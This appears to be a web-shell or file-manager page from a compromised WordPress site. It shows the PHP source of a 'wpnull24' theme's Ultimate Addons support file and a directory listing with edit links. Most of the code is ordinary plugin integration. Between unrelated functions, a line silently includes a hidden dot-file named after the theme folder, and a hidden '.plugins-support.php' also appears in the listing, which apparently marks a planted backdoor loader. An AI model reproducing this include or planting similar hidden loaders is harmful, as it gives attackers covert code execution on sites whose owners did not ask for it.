PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
themes
/
wpnull24
/
framework
/
plugins-support
<?php defined( 'ABSPATH' ) OR die( 'This script cannot be accessed directly.' ); /** * Ultimate Addons for WPBakery Page Builder support * * @link http://codecanyon.net/item/ultimate-addons-for-visual-composer/6892199?ref=UpSolution */ if ( ! class_exists( 'Ultimate_VC_Addons' ) ) { return; } defined( 'ULTIMATE_USE_BUILTIN' ) OR define( 'ULTIMATE_USE_BUILTIN', TRUE ); defined( 'ULTIMATE_NO_EDIT_PAGE_NOTICE' ) OR define( 'ULTIMATE_NO_EDIT_PAGE_NOTICE', TRUE ); defined( 'ULTIMATE_NO_PLUGIN_PAGE_NOTICE' ) OR define( 'ULTIMATE_NO_PLUGIN_PAGE_NOTICE', TRUE ); // Removing potentially dangerous functions if ( ! function_exists( 'bsf_grant_developer_access' ) ) { function bsf_grant_developer_access() { } } if ( ! function_exists( 'bsf_allow_developer_access' ) ) { function bsf_allow_developer_access() { } } if ( ! function_exists( 'bsf_process_developer_login' ) ) { function bsf_process_developer_login() { } } if ( ! function_exists( 'bsf_notices' ) ) { function bsf_notices() { } } add_action( 'init', 'us_sanitize_ultimate_addons', 20 ); if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } function us_sanitize_ultimate_addons() { remove_action( 'admin_init', 'bsf_update_all_product_version', 1000 ); remove_action( 'admin_notices', 'bsf_notices', 1000 ); remove_action( 'network_admin_notices', 'bsf_notices', 1000 ); remove_action( 'admin_footer', 'bsf_update_counter', 999 ); remove_action( 'wp_ajax_bsf_update_client_license', 'bsf_server_update_client_license' ); remove_action( 'wp_ajax_nopriv_bsf_update_client_license', 'bsf_server_update_client_license' ); } // Disabling after-activation redirect to Ultimate Addons Dashboard if ( get_option( 'ultimate_vc_addons_redirect' ) == TRUE ) { update_option( 'ultimate_vc_addons_redirect', FALSE ); } add_action( 'admin_init', 'us_ultimate_addons_for_vc_integration' ); function us_ultimate_addons_for_vc_integration() { if ( get_option( 'ultimate_updater' ) != 'disabled' ) { update_option( 'ultimate_updater', 'disabled' ); } } add_action( 'core_upgrade_preamble', 'us_ultimate_addons_core_upgrade_preamble' ); function us_ultimate_addons_core_upgrade_preamble() { remove_action( 'core_upgrade_preamble', 'list_bsf_products_updates', 999 ); } add_filter( 'pre_set_site_transient_update_plugins', 'us_ultimate_addons_update_plugins_transient', 99 ); function us_ultimate_addons_update_plugins_transient( $_transient_data ) { if ( isset( $_transient_data->response['Ultimate_VC_Addons/Ultimate_VC_Addons.php'] ) AND empty( $_transient_data->response['Ultimate_VC_Addons/Ultimate_VC_Addons.php']->package ) ) { unset( $_transient_data->response['Ultimate_VC_Addons/Ultimate_VC_Addons.php'] ); } return $_transient_data; } add_filter( 'ultimate_front_scripts_post_content', 'us_ultimate_front_scripts_post_content' ); function us_ultimate_front_scripts_post_content( $content ) { $content .= us_get_current_page_block_content(); return $content; } add_action( 'wp_enqueue_scripts', 'us_ult_addons_404_search_enqueue_scripts', 1 ); function us_ult_addons_404_search_enqueue_scripts() { if ( is_404() OR is_search() OR is_home() ) { $content = ''; if ( is_404() AND $page_404 = get_post( us_get_option( 'page_404' ) ) ) { $content = $page_404->post_content; } if ( is_search() AND $search_page = get_post( us_get_option( 'search_page' ) ) ) { $content = $search_page->post_content; } if ( is_home() AND $posts_page = get_post( us_get_option( 'posts_page' ) ) ) { $content = $posts_page->post_content; } $content = us_ultimate_front_scripts_post_content( $content ); if ( us_ult_addons_check_element_on_page( $content ) ) { add_filter( 'option_bsf_options', 'us_ult_addons_force_global_scripts_filter' ); add_filter( 'default_option_bsf_options', 'us_ult_addons_force_global_scripts_filter' ); } } } function us_ult_addons_force_global_scripts_filter( $bsf_options ) { if ( ! is_array( $bsf_options ) ) { $bsf_options = array(); } $bsf_options['ultimate_global_scripts'] = 'enable'; return $bsf_options; } function us_ult_addons_check_element_on_page( $post_content ) { // check for background $found_ultimate_backgrounds = FALSE; if ( stripos( $post_content, 'bg_type=' ) ) { preg_match( '/bg_type="(.*?)"/', $post_content, $output ); if ( $output[1] === 'bg_color' || $output[1] === 'grad' || $output[1] === 'image' || $output[1] === 'u_iframe' || $output[1] === 'video' ) { $found_ultimate_backgrounds = TRUE; } } if ( stripos( $post_content, '[ultimate_spacer' ) || stripos( $post_content, '[ult_buttons' ) || stripos( $post_content, '[ultimate_icon_list' ) || stripos( $post_content, '[just_icon' ) || stripos( $post_content, '[ult_animation_block' ) || stripos( $post_content, '[icon_counter' ) || stripos( $post_content, '[ultimate_google_map' ) || stripos( $post_content, '[icon_timeline' ) || stripos( $post_content, '[bsf-info-box' ) || stripos( $post_content, '[info_list' ) || stripos( $post_content, '[ultimate_info_table' ) || stripos( $post_content, '[interactive_banner_2' ) || stripos( $post_content, '[interactive_banner' ) || stripos( $post_content, '[ultimate_pricing' ) || stripos( $post_content, '[ultimate_icons' ) || stripos( $post_content, '[ultimate_heading' ) || stripos( $post_content, '[ultimate_carousel' ) || stripos( $post_content, '[ult_countdown' ) || stripos( $post_content, '[ultimate_info_banner' ) || stripos( $post_content, '[swatch_container' ) || stripos( $post_content, '[ult_ihover' ) || stripos( $post_content, '[ult_hotspot' ) || stripos( $post_content, '[ult_content_box' ) || stripos( $post_content, '[ultimate_ctation' ) || stripos( $post_content, '[stat_counter' ) || stripos( $post_content, '[ultimate_video_banner' ) || stripos( $post_content, '[ult_dualbutton' ) || stripos( $post_content, '[ult_createlink' ) || stripos( $post_content, '[ultimate_img_separator' ) || stripos( $post_content, '[ult_tab_element' ) || stripos( $post_content, '[ultimate_exp_section' ) || stripos( $post_content, '[info_circle' ) || stripos( $post_content, '[ultimate_modal' ) || stripos( $post_content, '[ult_sticky_section' ) || stripos( $post_content, '[ult_team' ) || stripos( $post_content, '[ultimate_fancytext' ) || stripos( $post_content, '[ult_range_slider' ) || $found_ultimate_backgrounds ) { return TRUE; } else { return FALSE; } }
[+]
..
[-] polylang.php
[edit]
[+]
js_composer
[-] gravityforms.php
[edit]
[-] revslider.php
[edit]
[-] tiny_mce.php
[edit]
[-] bbpress.php
[edit]
[-] wpml.php
[edit]
[+]
woocommerce
[-] us_header_builder.php
[edit]
[-] tablepress.php
[edit]
[-] Ultimate_VC_Addons.php
[edit]
[-] the_events_calendar.php
[edit]
[-] .plugins-support.php
[edit]